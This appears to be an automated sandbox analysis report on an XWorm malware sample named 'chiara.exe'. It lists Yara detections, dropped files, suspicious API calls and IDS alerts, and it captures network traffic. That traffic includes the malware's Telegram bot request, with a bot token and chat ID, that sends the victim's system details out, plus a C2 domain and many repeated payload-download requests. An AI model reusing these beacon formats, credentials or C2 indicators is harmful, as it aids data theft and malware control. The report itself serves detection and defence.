Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: consent.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Resources\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Resources\Themes\explorer.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Resources\spoolsv.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Resources\Themes\icsys.icn.exe, type: DROPPED

Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	2_2_00007FF6CCC940BC
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCAB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	2_2_00007FF6CCCAB190
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCBFCA0 FindFirstFileExA,	2_2_00007FF6CCCBFCA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49765 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 74.125.133.82 80	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 74.125.71.82 80	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 66.102.1.82 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: mariona.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: mariona.duckdns.org

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.shost.exe.477b518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.InstallUtil.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46fdeda.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46aa52a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.475185a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shost.exe.46d420a.5.raw.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: GET /bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3D2CFD5CADE17C3471CE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203A4PCO_8_%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Crypt HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3D2CFD5CADE17C3471CE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203A4PCO_8_%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Crypt HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
